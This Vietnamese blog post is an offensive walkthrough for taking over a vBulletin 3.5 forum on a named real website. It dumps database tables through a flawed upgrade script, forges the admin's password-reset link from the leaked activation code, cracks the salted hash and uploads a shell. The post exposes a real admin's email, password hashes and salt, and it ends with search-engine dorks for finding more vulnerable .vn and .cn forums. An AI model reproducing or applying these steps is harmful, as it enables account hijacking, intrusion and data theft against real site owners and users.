Bug VBB 3.5 ( lỗi dump file data )

Link check bug: http://www.ecolink.com.vn/forum/install/upgrade_301.php?step=bongmaonlinehp
Cách khai thác:
+Reset pass Admin
+Crack pass đã reset ( pass hash)

Chui vào forum xem admin nó là thằng nào:
Biết phải làm gì rồi đấy

http://www.ecolink.com.vn/forum/member.php?u=1 ~> chẳng nhìn thấy cái j` cả hix hix, bít mỗi nickadmin là admin

Quay trở lại cái link check bug kia. Dump cái forum_user về ngắm thử cái.
Thấy được một vài info về thèng admin nè

Trích dẫn
INSERT INTO forum_user VALUES(’1′,’2′,”,’0′,’Admin’,’2577b6ef6687621105a2f645109ce5e4′,’2006-04-28′,’lighthousehn@yahoo.com’,’0′,”,”,”,”,”,”,”,’2′,’2′,’Junior Member’,’0′,’1146211500′,’0′,’1171980120′,’1171984 020′,’1151399820′,’2′,’10′,’5′,’0′,’0′,’0′,’0′,’0′ ,’2135′,”,’0000-00-00′,’-1′,’1′,”,’0′,’0′,’0′,’0′,’-1′,’0′,’0′,’vuu’)

Thấy mail nó rồi, tiến hành fogot pass của nó thôi
http://www.ecolink.com.vn/forum/login.php?do=lostpw
Điền cái mail nó vào
Xong rồi đợi nó gửi cái link active về mail thôi. Ủa mà mình đâu bít pass mail nó nhề

Quay về cái link check bug dump cái forum_useractivation về. Ở đây ta sẽ lấy được activation code. Để coi lại cái đã

Trích dẫn
INSERT INTO forum_useractivation VALUES(’3′,’1′,’1171986142′,’62080582′,’1′,’2′)

Link active sau khi fogot pass gửi về mail của admin sẽ là:
http://www.ecolink.com.vn/forum/login.php?a=pwd&u=1&i=62080582
Muốn hiểu tại sao lại như vậy thì bạn thử fogot pass ở ngay forum này nè

Pass mới được tạo lưu ở trong forum_passwordhistory. Dump về rồi soi típ nhá.

Trích dẫn
INSERT INTO forum_passwordhistory VALUES(’1′,’ce221dbe4df612053202152fc68fc875′,’2007-02-20′);
INSERT INTO forum_passwordhistory VALUES(’1′,’3990cbe9c727d57e6d72bcd61bf9e8fe’,’2007-02-20′);

Cái trên là của mèo, cái dưới là của tớ (cái màu đỏ ý được gọi là j nhỉ ^^)

Passhash của forum VBB có dạng: hash = md5( md5( $password ) . $salt ) ( mã hóa 2 lần, mịa nó secu gớm !)

Bi giờ đi lấy Salt (Salt gồm 3 kí tự, được tạo ra trong lúc reg nick và không thay đổi theo lời gian ~~~> lão Miki nói vậy)

Trích dẫn
INSERT INTO forum_user VALUES(’1′,’2′,”,’0′,’Admin’,’2577b6ef6687621105a 2f645109ce5e4′,’2006-04-28′,’lighthousehn@yahoo.com’,’0′,”,”,”,”,”,” ,”,’2′,’2′,’Junior Member’,’0′,’1146211500′,’0′,’1171980120′,’1171984 020′,’1151399820′,’2′,’10′,’5′,’0′,’0′,’0′,’0′,’0′ ,’2135′,”,’0000-00-00′,’-1′,’1′,”,’0′,’0′,’0′,’0′,’-1′,’0′,’0′,’vuu’)

User: Admin
Passhash: 3990cbe9c727d57e6d72bcd61bf9e8fe ( hiện tại là thế ^^)
Salt: vuu

Dùng Passwordpro để crack ra pass admin ( hỏi tớ passwordpro lấy ở đâu là tớ óanh á ). Vào Admincp, đẩy shell lên.

Trích dẫn
keywork
Powered by vbulletin 3.5*+bạn
Powered by vbulletin 3.5*+tôi
Powered by vbulletin 3.5*inurl:”com.vn”
Powered by vbulletin 3.5*inurl:”net.vn”
Powered by vbulletin 3.5*inurl:”.vn”
Powered by vbulletin 3.5*inurl:”.cn”
Advertisements

About securityforall

it, smile, share for people,...

Posted on April 23, 2012, in All Bug Collection. Bookmark the permalink. Leave a comment.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s

%d bloggers like this: